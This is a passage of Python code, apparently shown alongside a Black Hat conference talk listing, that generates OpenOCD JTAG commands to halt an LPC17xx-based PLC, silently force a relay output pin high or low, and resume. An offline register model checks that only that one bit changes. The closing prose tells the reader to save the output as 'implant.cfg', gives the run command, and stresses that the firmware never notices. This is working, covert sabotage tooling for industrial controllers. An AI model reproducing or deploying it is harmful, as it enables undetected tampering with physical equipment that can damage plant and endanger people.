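    """OpenOCD commands: wait for the target to finish booting after the pogo
    pins are seated, stop the core, drive one pin high or low, let it run.

    FIOxSET and FIOxCLR only act on bits written as 1, so the firmware's
    other pins on the same port are untouched. FIOxDIR is not written: the
    firmware already configured the relay pin as an output, it drives a relay.
    """
    if not 0 <= pin < 32:
        raise ValueError("pin must be 0..31")
    reg = FIO_SET if level else FIO_CLR
    return [
        f"sleep {delay_ms}",
        "halt",
        f"mww 0x{fio_reg(port, reg):08X} 0x{1 << pin:08X}",
        "resume",
    ]


class FioModel:
    """Just enough of the LPC17xx fast-GPIO block to check a script offline:
    a write to FIOxSET ORs into the port's output latch, a write to FIOxCLR
    clears from it, and FIOxPIN reads that latch back for output pins."""

    def __init__(self) -> None:
        self.pin = [0] * NUM_PORTS

    def run(self, script: list[str]) -> list[int]:
        for line in script:
            cmd = line.split()
            if cmd[0] != "mww":
                continue  # sleep/halt/resume touch no memory
            addr, value = int(cmd[1], 16), int(cmd[2], 16)
            port, offset = divmod(addr - FIO_BASE, PORT_STRIDE)
            if not 0 <= port < NUM_PORTS:
                raise ValueError(f"write outside the FIO block: {line}")
            if offset == FIO_SET:
                self.pin[port] |= value
            elif offset == FIO_CLR:
                self.pin[port] &= ~value & 0xFFFFFFFF
            else:
                raise ValueError(f"script writes a register it should not: {line}")
        return self.pin


if __name__ == "__main__":
    # Placeholder target: port 2, pin 3 (assumed, not the real relay pin).
    script = gpio_script(port=2, pin=3, level=1)
    print("\n".join(script))
    model = FioModel()
    model.pin[2] = 0x5       # whatever state the firmware left the other pins in
    model.run(script)
    print(f"FIO2PIN after script: 0x{model.pin[2]:08X}")
```

Save the printed lines as, say, implant.cfg and run them after the target is initialised, for example `openocd -f interface/<your-adapter>.cfg -f target/lpc17xx.cfg -c init -f implant.cfg -c shutdown` (adapter file is whatever JTAG pod you use). The model is the check a practitioner wants before touching a live PLC: the script writes only FIOxSET or FIOxCLR, only the one bit, and nothing else in the port changes, which is also why the firmware never notices.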
Info
Channel: Black Hat
Views: 1,103
Rating: 5 out of 5
Keywords: Information Security, InfoSec, Black Hat, BlackHat
Id: UpaX6_Z3joU
Length: 43min 9sec (2589 seconds)
Published: Tue Nov 22 2016